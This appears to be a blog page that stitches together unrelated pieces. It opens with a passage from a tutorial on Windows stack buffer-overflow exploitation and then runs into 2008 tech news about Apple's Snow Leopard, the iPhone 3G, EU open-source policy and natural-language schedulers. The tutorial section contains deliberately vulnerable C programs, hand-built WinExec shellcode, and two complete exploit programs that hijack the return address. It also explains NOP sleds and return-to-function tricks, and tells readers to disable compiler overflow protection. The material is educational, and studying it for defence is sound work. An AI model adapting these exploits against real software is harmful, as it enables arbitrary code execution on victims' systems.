When executed, the above application returns an access violation {2}. Why? Because an attempt was made to fit a 16-character string into an 8–byte space (it is fairly possible since no checking of limits is carried out). Thus, the allocated memory space has been exceeded and the data at the stack bottom is overwritten. Let us look once again at Figure 2. Such critical data as both the frame address and the return address get overwritten (!). Therefore, upon returning from the function, a modified return address has been pushed into EIP, thereby allowing the program to proceed with the address pointed to by this value, thus creating the stack execution error. So, corrupting the return address on the stack is not only feasible, but also trivial if “enhanced” by programming errors.

Poor programming practices and bugged software provide a huge opportunity for a potential attacker to execute malicious code designed by him.

Stack overrun

We must now sort all the information. As we already know, the program uses the EIP register to control execution. We also know that upon calling a function, the address of the instruction immediately following the call instruction is pushed onto the stack and then popped from there and moved to EIP when a return is performed. We may ascertain that the saved EIP can be modified when being pushed onto the stack, by overwriting the buffer in a controlled manner. Thus, an attacker has all the information to point his own code and get it executed, creating a thread in the victim process.

Roughly, the algorithm to effectively overrun the buffer is as follows:

1. Discovering a code, which is vulnerable to a buffer overflow.

2. Determining the number of bytes to be long enough to overwrite the return address.

3. Calculating the address to point the alternate code.

4. Writing the code to be executed.

5. Linking everything together and testing .

The following Listing 3 is an example of a victim’s code.

Listing 3 – The victim’s code

#include

#define BUF_LEN 40

void main(int argc, char **argv)

{

char buf[BUF_LEN];

if (argv > 1)

{

printf(„\buffer length: %d\nparameter length: %d”, BUF_LEN, strlen(argv[1]) );

strcpy(buf, argv[1]);

}

}

This sample code has all the characteristics to indicate a potential buffer overflow vulnerability: a local buffer and an unsafe function that writes to memory, the value of the first instruction line parameter with no bounds checking employed.

Putting to use our newfound knowledge, let us accomplish a sample hacker’s task. As we ascertained earlier, guessing a code section potentially vulnerable to buffer overflow seems simple. The use of a source code (if available) may be helpful otherwise we can just look for something critical in the program to overwrite it. The first approach will focus on searching for string-based function like strcpy(), strcat() or gets(). Their common feature is that they do not use unbounded copy operations, i.e. they copy as many as possible until a NULL byte is found (code 0). If, in addition, these functions operate on a local buffer and there is the possibility to redirect the process execution flow to anywhere we want, we will be successful in accomplishing an attack. Another approach would be trial and error, by relying on stuffing an inconsistently large batch of data inside any available space. Consider now the following example:

victim.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

If the program returns an access violation error, we may simply move on to step 2.

The problem now, is to construct a large string with overflow potential to effectively overwrite the return address. This step is also very easy. Remembering that only whole words can be pushed onto the stack, we simply need to construct the following string:

AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUU.............

If successful, in terms of potential buffer overflow, this string will cause the program to fail with the well-known error message:

The instruction at „0x4b4b4b4b” referenced memory at „0x4b4b4b4b”. The memory could not be „read”

The only conclusion to be drawn is that since the value 0x4b is the letter capital “K” in ASCII code, the return address has been overwritten with „KKKK”. Therefore, we can proceed to Step 3.Finding the buffer beginning address in memory (and the injected shellcode) will not be easy. Several methods can be used to make this “guessing” more efficient, one of which we will discuss now, while the others will be explained later. In the meanwhile we need to get the necessary address by simply tracing the code. After starting the debugger and loading the victim program, we will attempt to proceed. The initial concern is to get through a series of system function calls that are irrelevant from this task point of view. A good method is to trace the stack at runtime until the input string characters appear successively. Perhaps two or more approaches will be required to find a code similar to that provided below:

:00401045 8A08 mov cl, byte ptr [eax]

:00401047 880C02 mov byte ptr [edx+eax], cl

:0040104A 40 inc eax

:0040104B 84C9 test cl, cl

:0040104D 75F6 jne 00401045

This is the strcpy function we are looking for. On entry to the function, the memory location pointed by EAX is read in order to move (next line) its value into memory location, pointed by the sum of the registers EAX and EDX. By reading the content of these registers during the first iteration we can determine that the buffer is located at 0x0012fec0.

Writing a shellcode is an art itself. Since operating systems use different system function calls, an individual approach is needed, depending on the OS environment under which the code must run and the goal it is being aimed at. In the simplest case, nothing needs to be done, since just overwriting the return address causes the program to deviate from its expected behavior and fail. In fact, due to the nature of buffer overflow flaws associated with the possibility that the attacker can execute arbitrary code, it is possible to develop a range of different activities constrained only by available space (although this problem can also be circumvented) and access privileges. In most cases, buffer overflow is a way for an attacker to gain “super user” privileges on the system or to use a vulnerable system to launch a Denial of Service attack. Let us try, for example, to create a shellcode allowing commands (interpreter cmd.exe in WinNT/2000). This can be attained by using standard API functions: WinExec or CreateProcess. When WinExec is called, the process will look like this:

WinExec(command, state)

In terms of the activities that are necessary from our point of view, the following steps must be carried out:

- pushing the command to run onto the stack. It will be „cmd /c calc”.

- pushing the second parameter of WinExec onto the stack. We assume it to be zero in this script.

- pushing the address of the command „cmd /c calc”.

- calling WinExec.

There are many ways to accomplish this task and the snippet below is only one of possible tricks:


sub esp, 28h ; 3 bytes

jmp call ; 2 bytes

par:

call WinExec ; 5 bytes

push eax ; 1 byte

call ExitProcess ; 5 bytes

calling:

xor eax, eax ; 2 bytes

push eax ; 1 byte

call par ; 5 bytes

.string cmd /c calc|| ; 13 bytes

Some comments on this:

sub esp, 28h

This instruction adds some room to the stack. Since the procedure containing an overflow buffer had been completed, consequently, the stack space allocated for local variables is now declared as unused due to the change in ESP. This has the effect that any function call which is given from the code level is likely to overwrite our arduously constructed code inserted in the buffer. To have a function callee-save, all we need is to restore the stack pointer to what it was before “garbage”, that is to its original value (40 bytes) thereby assuring that our data will not be overwritten.

jmp call

The next instruction jumps to the location where the WinExec function arguments are pushed onto the stack. Some attention must be paid to this. Firstly, a NULL value is required to be “elaborated” and placed onto the stack. Such a function argument cannot be taken directly from the code otherwise it will be interpreted as null terminating the string that has only been partially copied. In the next step, we need a way of pointing the address of the command to run and we will make this in a somewhat ad hoc manner. As we may remember, each time a function is called, the address following the call instruction is placed onto the stack. Our successful (hopefully) exploit first overwrites the saved return address with the address of the function we wish to call. Notice that the address for the string may appear somewhere in the memory. Subsequently, WinExec followed by ExitProcess will be run. As we already know, CALL represents an offset that moves the stack pointer up to the address of the function following the callee. And now we need to compute this offset. Fig. 3 below shows a structure of a shellcode to accomplish this task.

Fig. 3 A sample shellcode

Legend:

As can be seen, our example does not consider our reference point, the EBP, that needs to be pushed onto the stack. This is due to an assumption that the victim program is a VC++ 7 compiled code with its default settings that skip the said operation. The remaining job around this problem is to have the code pieces put together and test the whole. The above shellcode, incorporated in a C program and being more suitable for the CPU is presented in Listing 4.

Listing 4 – Exploit of a program victim.exe

#include

#include

#include

#include

char *victim = "victim.exe";

char *code = "\x90\x90\x90\x83\xec\x28\xeb\x0b\xe8\xe2\xa8\xd6\x77\x50\xe8\xc1\x90\xd6\x77\x33\xc0\x50\xe8\xed\xff\xff\xff";

char *oper = "cmd /c calc||";

char *rets = "\xc0\xfe\x12";

char par[42];

void main()

{

strncat(par, code, 28);

strncat(par, oper, 14);

strncat(par, rets, 4);

char *buf;

buf = (char*)malloc( strlen(victim) + strlen(par) + 4);

if (!buf)

{

printf("Error malloc");

return;

}

wsprintf(buf, "%s \"%s\"", victim, par);

printf("Calling: %s", buf);

WinExec(buf, 0);

}

Ooops, it works! The only requisite is that the current directory has a compiled file victim.exe from Listing 3. If all goes as expected, we will see a window with a well-known System Calculator.

Stock-based and non-stack based exploits

In the previous example we presented an own code that is executable once the control over the program has been taken over. However, such an approach may not be applicable, when a „victim” is able to check that no illegal code on the stack is executed, otherwise the program will be stopped. Increasingly, so called non-stack based exploits are being used. The idea is to directly call the system function by overwriting (nothing new!) the return address using, for example, WinExec. The only remaining problem is to push the parameters used by the function onto the stack in a useable state. So, the exploit structure will be like in Figure 4.

Fig. 4 A non-stack based exploit

Legend:

A non-stack-based exploit requires no instruction in the buffer but only the calling parameters of the function WinExec. Because a command terminated with a NULL character cannot be handled, we will use a character ‘|’. It is used to link multiple commands in a single command line. This way each successive command will be executed only if the execution of a previous command has failed. The above step is indispensable for terminating the command to run without having executed the padding. Next to the padding which is only used to fill the buffer, we will place the return address (ret) to overwrite the current address with that of WinExec. Furthermore, pushing a dummy return address onto it (R) must ensure a suitable stack size. Since WinExec function accepts any DWORD values for a mode of display, it is possible to let it use whatever is currently on the stack. Thus, only one of two parameters remains to terminate the string.

In order to test this approach, it is necessary to have the victim’s program. It will be very similar to the previous one but with a buffer which is considerably larger (why? We will explain later). This program is called victim2.exe and is presented as Listing 5.

Listing 5 – A victim of a non-stack based exploit attack

#include

#define BUF_LEN 1024

void main(int argc, char **argv)

{

char buf[BUF_LEN];

if (argv > 1)

{

printf(„\nBuffer length: %d\nParameter length: %d”, BUF_LEN, strlen(argv[1]) );

strcpy(buf, argv[1]);

}

}

To exploit this program we need a piece given in Listing 6.

Listing 6 – Exploit of the program victim2.exe

#include

char* code = "victim2.exe \"cmd /c calc||AAAAA...AAAAA\xaf\xa7\xe9\x77\x90\x90\x90\x90\xe8\xfa\x12\"";

void main()

{

WinExec( code, 0 );

}

For simplicity’s sake, a portion of „A” characters from inside the string has been deleted. The sum of all characters in our program should be 1011.

When the WinExec function returns, the program makes a jump to the dummy saved return address and will consequently quit working. It will then return the function call error but by that time the command should already be performing its purpose.

Given this buffer size, one may ask why it is so large whereas the “malicious” code has become relatively smaller? Notice that with this procedure, we overwrite the return address upon termination of the task. This implies that the stack top restores the original size thus leaving a free space for its local variables. This, in turn, causes the space for our code (a local buffer, in fact) to become a room for a sequence of procedures. The latter can use the allocated space in an arbitrary manner, most likely by overwriting the saved data. This means that there is no way to move the stack pointer manually, as we cannot execute any own code from there. For example, the function WinExec that is called just at the beginning of the process, occupies 84 bytes of the stack and calls subsequent functions that also place their data onto the stack. We need to have such a large buffer to prevent our data from destruction. Figure 5 illustrates this methodology.

Fig. 5 A sample non-stack based exploit: stack usage

Legend:

This is just one of possible solutions that has many alternatives to consider. First of all, it is easy to compile because it is not necessary to create an own shellcode. It is also immune to protections that use monitoring libraries for capturing illegal codes on the stack.

System function calling

Notice, that all previously discussed system function callings employ a jump command to point to a pre-determined fixed address in memory. This determines the static behavior of the code which implies that we agree to have our code non transferable across various Windows operating environments. Why? Our intention is to suggest a problem associated with the fact that various Windows OSes use different user and kernel addresses. Therefore, the kernel base address differs and so do the system function addresses. For details, see Table 1.

Table 1. Kernel addresses vs. OS environment

Windows Platform

Kernel Base Address

Win95

0xBFF70000

Win98

0xBFF70000

WinME

0xBFF60000

WinNT (Service Pack 4 and 5)

0x77F00000

Win2000

0x77F00000

To prove it, simply run our example under operating an system other than Windows NT/2000/XP.

What remedy would be appropriate? The key is to dynamically fetch function addresses, at the cost of a considerable increase in the code length. It turns out that it is sufficient to find where two useful system functions are located, namely GetProcAddress and LoadLibraryA, and use them to get any other function address returned. For more details, see references, particularly the Kungfoo project developed by Harmony [6].

Other ways of defining the beginning of the buffer

All previously mentioned examples used Debugger to establish the beginning of the buffer. The problem lies in the fact that we wanted to establish this address very precisely. Generally, it is not a necessary requirement. If, assuming that the beginning of an alternate code is placed somewhere in the middle of the buffer and not at the buffer beginning whereas the space after the code is filled with many identical jump addresses, the return address will surely be overwritten as required. On the other hand, if we fill the buffer with a series of 0x90s till the code beginning, our chance to guess the saved return address will grow considerably. So, the buffer will be filled as illustrated in Figure 6.

Fig. 6 Using NOPs during an overflow attack

Legend:

The 0x90 code corresponds to a NOP slide that does literally nothing. If we point at any NOP, the program will slide it and consequently it will go to the shellcode beginning. This is the trick to avoid a cumbersome search for the precise address of the beginning of the buffer.

Where does the risk lie?

Poor programming practices and software bugs are undoubtedly a risk factor. Typically, programs that use text string functions with their lack of automatic detection of NULL pointers. The standard C/C++ libraries are filled with a handful of such dangerous functions. There are: strcpy(), strcat(), sprintf(), gets(), scanf(). If their target string is a fixed size buffer, a buffer overflow can occur when reading input from the user into such a buffer.

Another commonly encountered method is using a loop to copy single characters from either the user or a file. If the loop exit condition contains the occurrence of a character, this means that the situation will be the same as above.

Preventing buffer overflow attacks

The most straightforward and effective solution to the buffer overflow problem is to employ secure coding. On the market there are several commercial or free solutions available which effectively stop most buffer overflow attacks. The two approaches here are commonly employed:

- library-based defenses that use re-implemented unsafe functions and ensure that these functions can never exceed the buffer size. An example is the Libsafe project.

- library-based defenses that detect any attempt to run illegitimate code on the stack. If the stack smashing attack has been attempted, the program responds by emitting an alert. This is a solution implemented in the SecureStack developed by SecureWave.

Another prevention technique is to use compiler-based runtime boundaries, checking what recently became available and hopefully with time, the buffer overflow problem will end up being a major headache for system administrators. While no security measure is perfect, avoiding programming errors is always the best solution.

Summary

Of course, there are plenty of interesting buffer overflow issues which have not been discussed. Our intention was to demonstrate a concept and bring forth certain problems. We hope that this paper will be a contribution to the improvement of the software development process quality through better understanding of the threat, and hence, providing better security to all of us.

References

The links listed below form a small part of a huge number of references available on the World Wide Web.

[1] Aleph One, Smashing The Stack For Fun and Profit, Phrack Magazine nr 49, http://www.phrack.org/show.php?p=49&a=14
[2] P. Fayolle, V. Glaume, A Buffer Overflow Study, Attacks & Defenses, http://www.enseirb.fr/~glaume/indexen.html
[3] I. Simon, A Comparative Analysis of Methods of Defense against Buffer Overflow Attacks, http://www.mcs.csuhayward.edu/~simon/security/boflo.html
[4] Bulba and Kil3r, Bypassing StackGuard and Stackshield, Phrack Magazine 56 No 5, http://phrack.infonexus.com/search.phtml?view&article=p56-5
[5] many interesting papers on Buffer Overflow and not only: http://www.nextgenss.com/research.html#papers
[6] http://harmony.haxors.com/kungfoo
[7] http://www.research.avayalabs.com/project/libsafe/
[8] http://www.securewave.com/products/securestack/secure_stack.html

Endnotes:

{1} In practice, certain code-optimizing compilers may operate without pushing EBP on the stack. The Visual C++ 7 Compiler uses it as a default option. To deactivate it, set: Project Properties | C/C++ | Optimization | Omit Frame Pointer for NO.

{2} Microsoft has introduced a buffer overrun security tool in its Visual C++ 7. If you are intending to use the above examples to run in this environment, ensure that this option is not selected before compilation: Project Properties | C/C++ | Code Generation | Buffer Security Check should have the value NO.

Demo: Complete Module

----------------------------------------------------------------------------------------------

Wednesday, June 11, 2008

Apple in Parallel: Turning the PC World Upside Down?

Steve JobsSteven P. Jobs, chief executive of Apple, at the company’s Worldwide Developers Conference on Monday. (Credit: Kimberly White/Reuters)

(Updated with more information at 1:45 p.m. EDT)

(Corrected OpenCL definition at 10:05 p.m. EDT)

At the outset of his presentation at the opening session of Apple’s Worldwide Developers Conference, Steve Jobs showed a slide of a stool with three legs to describe the company’s businesses: Macintosh, music and the iPhone.

The company is making another bet on parallelism, and the implications may be more profound than anyone yet realizes.

In describing the next version of the Mac OS X operating system, dubbed Snow Leopard, Mr. Jobs said Apple would focus principally on technology for the next generation of the industry’s increasingly parallel computer processors.

Today the personal computer industry is going through a wrenching change in trying to find a way to keep up with the speed increases that were the hallmark of the PC business until about five years ago. At that point, companies like Intel, I.B.M. and AMD had simply lived off their continual ability to increase the clock speeds of their microprocessors. But the industry hit a wall as chips reached the melting point.

As a consequence, the industry shifted gears and began making lower-power processors that added multiple C.P.U.’s. The idea was to gain speed by breaking up problems into multiple pieces and computing the parts simultaneously.

The problem is that, having headed down that path, the industry is now admitting that it doesn’t know how to program the new parallel chips efficiently when the number of cores goes above a handful.

On Monday, Mr. Jobs claimed that Apple is coming to the rescue.

“We’ve added over a thousand features to Mac OS X in the last five years,” he said Monday in an interview after his presentation. “We’re going to hit the pause button on new features.”

Instead, the company is going to focus on what he called “foundational features” that will be the basis for a future version of the operating system.

“The way the processor industry is going is to add more and more cores, but nobody knows how to program those things,” he said. “I mean, two, yeah; four, not really; eight, forget it.”

Apple, he claimed, has made a parallel-programming breakthrough.

It is all about the software, he said. Apple purchased a chip company, PA Semi, in April, but the heart of Snow Leopard will be about a parallel-programming technology that the company has code-named Grand Central.

“PA Semi is going to do system-on-chips for iPhones and iPods,” he said.

Grand Central will be at the heart of Snow Leopard, he said, and the shift in technology direction raises lots of fascinating questions, including what will happen to Apple’s partnership with Intel.

ADDED: Snow Leopard will also tap the computing power inherent in the graphics processors that are now used in tandem with microprocessors in almost all personal and mobile computers. Mr. Jobs described a new processing standard that Apple is proposing called OpenCL (Open Compute LibraryComputing Language) which is intended to refocus graphics processors on standard computing functions.

“Basically it lets you use graphics processors to do computation,” he said. “It’s way beyond what Nvidia or anyone else has, and it’s really simple.”

Since Intel trails both Nvidia and AMD’s ATI graphics processor division, it may mean that future Apple computers will look very different in terms of hardware.

Just this week, for example, a Los Alamos National Laboratory set the world supercomputer processing speed record. The machine was based largely on a fleet of more than 12,000 I.B.M. Cell processors, originally designed for the Sony PS3 video-game machine.

If Apple can use similar chips to power its future computers, it will change the computer industry

EU pushes open-source standard as 'smart business'

Tuesday, June 10, 2008

EU pushes open-source standard as 'smart business'

By Associated Press

BRUSSELS, Belgium (AP) _ The EU's top antitrust official called Tuesday on member governments to use open-source software, an apparent jab at Microsoft Corp.'s proprietary technology.

"No citizen or company should be forced or encouraged to choose a closed technology over an open one, through a government having made that choice first," European Competition Commissioner Neelie Kroes said at a conference organized by OpenForum Europe, a nonprofit group that advocates open standards.

Choosing technology formats that can be used by different vendors -- often without paying a fee -- is "a very smart business decision," Kroes said.

She said the European Commission would do its part when it picks software standards for its own use, saying "it must not rely on one vendor, it must not accept closed standards and it must refuse to become locked into a particular technology."

Her comments appeared to target Microsoft -- currently under EU investigation for a second time for possible antitrust violations. The company shunned an existing open format for archiving word processing documents backed by IBM and open source developers in favor of its own open version, Office Open XML, or OOXML.

Despite a chorus of complaints, OOXML was approved in April as an international standard. That paved the way for OOXML to be picked up by the IT departments of governments and large corporations -- although the approval is on hold while protests are resolved.

Critics of OOXML claim it locks out competitors, giving Microsoft customers no choice but to keep buying Microsoft programs forever.

"We need to be aware of the long-term costs of lock-in: you are often locked-in to subsequent generations of that technology," she said. "There can also be spillover effects where you get locked in to other products and services provided by that vendor."

Kroes said an industry should not rush to set standards that all rivals needed to follow. And companies that hold key patents should be clear about the royalties they would charge if their patent becomes part of a standard, she said.

A Self-Writing To-Do List

Wednesday, June 11, 2008

A Self-Writing To-Do List

New online schedulers rely on natural-language processing to take the drudgery out of getting organized.

By Lissa Harris

The problem with to-do lists and schedules is that you need to fill them out. Now, a new generation of free online schedulers promises to end that drudgery. These new Web applications use natural-language processing to interpret spoken commands and ordinary written sentences to build calendars and personal organizers.

Perhaps the simplest of the new generation of schedulers is Presdo, based in San Francisco, which launched in late April to help users collaborate to schedule meetings and other events. Borrowing from Google's successful bag of tricks, Presdo's home page is as simple as it gets: just a floating text box. Type in "have brunch with Margaret on Sunday," and Presdo translates your command into data, bringing you to a page where you and your guests can check and tweak the details of your event.

By taking its cues from the ways that people naturally talk about time, the software frees users to be general about dates and times, says Presdo founder Eric Ly. Imprecise phrases like "next month," which would be impossible to put on a calendar without picking a particular date and time, are allowed to stay fluid for as long as the user wants them to.

Credit: Technology Review

"There's no widget in our system that looks anything like a calendar, and that was intentional," says Ly. "We really wanted to make it very easy for people to express what they wanted in terms of time. We felt like the natural-language approach was going to be more flexible and expressive for users." If you sign up as a regular user, Presdo will gather more information to help it guess automatically. For example, it will suggest restaurants near where you live via Google Maps, or it will remember Margaret's e-mail address from your last event together.

But translating the vagaries of ordinary speech into data that a computer can understand is a tough technical problem. "One thing this made me acutely aware of is how weirdly people speak," says Rael Dornfest, developer of IWantSandy, an online personal-assistant program based in Portland, Oregon, that uses simple text-based interactions to generate calendar items, to-do lists, and reminders. "There are little things that are sort of classic. When I say 'next week,' do I mean the week upcoming or the week after that? The problem is not about parsing. It's that if you said it to 15 people, half would interpret it one way, and half the other way."

Sandy--named after free-software advocate Tim O'Reilly's real-life personal assistant--can intelligently read e-mails, text messages, and Twitter feeds. Dornfest calls Sandy's algorithm "natural-language-ish processing": it's basically English, with a few keywords to help Sandy recognize common tasks. Telling her to "remind" or "remember" something generates an automatic e-mail or text-message reminder; adding "@todo" to your message places it on your to-do list.

By using ubiquitous communication tools like e-mail and text messaging to interact with Sandy, says Dornfest, users can get organized without stopping to think too hard about it. "A lot of the things Sandy takes down would never have made it into a calendar in your lifetime--it's just too painful," he says. "Most organizational systems break your flow. They try to make you do something else for a moment, and then you can go back to whatever you were doing in the first place."

Another new program, reQall--developed by QTech, based in Hyderabad, India--pushes that idea even further by giving users a toll-free number they can call and leave messages at. Whatever your favorite communication medium--e-mail, Web, text messaging, or phone--odds are that reQall can parse it. Voice-recognition software, live human transcriptionists, and natural-language processing algorithms read your messages and use them to generate reminders that can be delivered by e-mail, text messages, or voice calls, customized for the user.

"If I say, 'Remember to buy a watermelon tomorrow,' I won't see it today," says QTech founder Sunil Vemuri, who got the idea for the program while a PhD student researching memory at MIT's Media Lab. "The system will interpret the sentence and put it in the right place. It removes some of the cognitive burdens of trying to get the idea out and organize it."

Neither Presdo, IWantSandy, nor reQall has an obvious business model. Their creators are contemplating charging fees for premium accounts in the future, but for now, all three applications are free of charge.

The sudden popularity of organizers that are just a text message away may be part of a larger trend. For two decades, software has been dominated by graphical user interfaces, which employ visual features like windows and icons to convey information. But clearly, Google isn't the only company that's banking on text entry. The command line is making a comeback--and increasingly, natural-language processing is bringing the ease and simplicity of text-based computing to the non-tech-savvy.

"There are going to be more and more applications which are less monolithic screens, and more dashing off quick missives," says Dornfest. "We've just begun to scratch the surface here."

Tuesday, June 10, 2008

Apple Updates iPhone, Slashes Price

Apple Updates iPhone, Slashes Price


Steve Jobs, Apple's CEO, confirms rumors that a cheaper iPhone with GPS will be available in July.

By Kate Greene

Monday, June 09, 2008

As at any Apple event, attendees of the World Wide Developers Conference in San Francisco showed up on Monday expecting to be awed by a Steve Jobs Show. And judging from the elevated mood in the room immediately after the Apple CEO's presentation, they were. The biggest technical news, which was widely predicted, is that the new iPhone, available July 11, will operate over so-called 3G networks, which are many times faster than the EDGE networks that the iPhone currently uses. Also confirmed was the rumor of GPS for real-time location tracking on the iPhone. But perhaps the most crowd-pleasing announcement is the dramatic price cut: from $399 for an eight-gigabyte model to $199. A 16-gigabyte model will be $299 and available in black and white.

When the iPhone was introduced last June, some analysts predicted that consumers would reject it because of its hefty price tag and its reliance on AT&T's relatively slow network. Since the phone's release, roughly six million iPhones have been sold to people who have looked past sluggish downloads and fallen in love with the gadget's intuitive touch interface and impressive graphics. But the difference between the EDGE and 3G networks can be startling. During Jobs's presentation, he contrasted the two versions of the phone. It takes 59 seconds for the current phone to load a Web page with heavy graphics. On the new 3G phone, the same page loads in 21 seconds. By comparison, it takes 17 seconds on a Wi-Fi network. E-mail applications download 3.6 percent faster.

By adding GPS, Apple has taken an important step toward expanding location-based services--tools that people use to find friends and activities around them in real time. Today's iPhone has the ability to locate itself, within a relatively large radius, using signals from cell-phone towers and Wi-Fi stations. GPS takes it a step farther, pinpointing location down to a couple of meters. This enables real-time tracking, making the iPhone a useful in-car navigation tool.

Jobs also provided an update of the third-party software, available in the forthcoming iPhone application store, and updates on the phone's compatibility with enterprise software. As announced in March, the iPhone will support Microsoft Exchange, providing compatibility with Outlook's mail, contacts, and calendar. The iPhone will also support Apple's iWork collection of productivity software, as well as Microsoft Office. And importantly, it will include the security features that have convinced enterprise customers--including the U.S. military and a number of Fortune 500 companies, law firms, and pharmaceutical companies--that the iPhone is as secure as any mobile device.

Credit: Technology Review

Since March, when the iPhone software developer kit was launched, a number of third-party companies and individual programmers have been racing to develop applications that run on the phone. At the conference, Apple highlighted a handful. Game developers are excited about the potential for using the built-in accelerometers as game controllers, and Sega showed off its Super Monkey Ball game. Loopt, a location-based startup that has previously only run on Sprint and Boost Mobile phones, demonstrated how a person using its service could find nearby friends. Typepad, a popular blogging tool, will offer software that enables easy mobile blogging on the iPhone.

In addition to the iPhone upgrades and previews of third-party software, Apple announced that it has revamped its .Mac service, a $99 a year service that provides e-mail, a Web page, and syncing options. It has been rebranded into MobileMe and will enable mail, calendar updates, and address-book changes to stay constantly synchronized over all Macs, PCs, and iPhones. This move illustrates that Apple is finally ready to recognize the importance of cloud computing, famously the province of Google and other Internet companies. However, since it's a pay service, it's unclear how much traction Apple will see as it competes with popular free services such as Gmail and Yahoo's Flickr.

As with all Steve Jobs keynotes, bullet points were big, and technical details were scarce. However, in the coming weeks, and after the iPhone's release on July 11, more information is expected to emerge. Some experts were predicting an upgrade to the phone's camera, but on Monday, there was no mention of a camera update or added video capabilities.